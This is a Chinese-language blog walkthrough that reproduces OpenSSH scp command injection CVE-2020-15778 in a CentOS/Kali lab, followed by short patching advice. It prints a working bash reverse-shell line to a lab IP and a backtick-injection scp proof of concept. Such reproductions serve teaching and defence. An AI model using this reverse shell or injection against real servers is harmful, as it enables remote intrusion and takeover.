OpenSSH 命令注入漏洞CVE-2020-15778的示例分析

发布时间:2021-11-11 21:32:43 作者:柒染
来源:亿速云 阅读:642

这期内容当中小编将会给大家带来有关OpenSSH 命令注入漏洞CVE-2020-15778的示例分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

0x00 漏洞介绍

CVE编号:CVE-2020-15778

发布时间:2020-07-24

危害等级:高危

漏洞版本:<= openssh-8.3p1

漏洞描述:OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`),可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshell。

利用条件:知道目标的ssh密码

0x01 模拟场景

设置iptables策略模拟仅允许使用scp的场景,让该漏洞在特殊环境下实现命令注入。

0x02 实验场景部署

靶机环境:Centos 7

渗透机环境:Kali 2019版本

1、查看ssh版本

ssh -V

OpenSSH 命令注入漏洞CVE-2020-15778的示例分析

测试为漏洞存在版本。

2、测试ssh与scp在正常情况下的使用情况。

OpenSSH 命令注入漏洞CVE-2020-15778的示例分析

可以正常使用。

3、执行ervice iptables status 检查是否安装iptables,若已安装IP tables,可跳过第三步。

(1)安装iptables

yum install -y iptables

(2)安装iptables-services

yum install iptables-services

(3)centOS7默认自带firewalld

先停止firewalld服务 
systemctl stop firewalld
禁用firewalld服务 
systemctl mask firewalld

(4)查看现有规则

iptables -L -vn

iptables -F是清空默认规则

iptables -L -n --line-number 显示规则和相对应的编号

4、在Centos中设置iptables策略,禁用ssh远程连接,但开放scp。

OpenSSH 命令注入漏洞CVE-2020-15778的示例分析

命令:

service iptables start
iptables -t filter -A INPUT -p tcp --dport 22 -m tos --tos 0x10 -j DROP
service iptables save
iptables -L -n --line-number

5、测试ssh与scp在已设置iptables策略下的使用情况。

OpenSSH 命令注入漏洞CVE-2020-15778的示例分析

0x03 SSH命令注入漏洞复现

1、在kali创建一个1.sh文件,并写入一个反弹shell的bash命令。

bash -i >& /dev/tcp/192.168.207.156/4444 0>&1

OpenSSH 命令注入漏洞CVE-2020-15778的示例分析

2、使用scp命令,把该文件上传到靶机的/tmp下

OpenSSH 命令注入漏洞CVE-2020-15778的示例分析

3、在新建的命令行页面中输入命令:

OpenSSH 命令注入漏洞CVE-2020-15778的示例分析

4、使用POC,远程执行命令。

scp 1.sh root@192.168.207.156:'`sh /tmp/1.sh`'

OpenSSH 命令注入漏洞CVE-2020-15778的示例分析

5、可以看到,在输完密码后,稍等一会就已经成功反弹了shell,实验结束。

OpenSSH 命令注入漏洞CVE-2020-15778的示例分析

0x04 漏洞防御

1、先确保ssh密码没有泄露,等一波openssh的新版本吧

2、升级ssh版本

3、等待厂商发布补丁

上述就是小编为大家分享的OpenSSH 命令注入漏洞CVE-2020-15778的示例分析了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注亿速云行业资讯频道。

推荐阅读:
  1. centos6.6升级openssh到最新版本7.5.p1
  2. Portable OpenSSH GSSAPI远程代码执行漏洞(CVE-2006-5051)漏洞解决方案

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

命令注入

上一篇:Elasticsearch运维实战常用命令有哪些

下一篇:Django中的unittest应用是什么

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》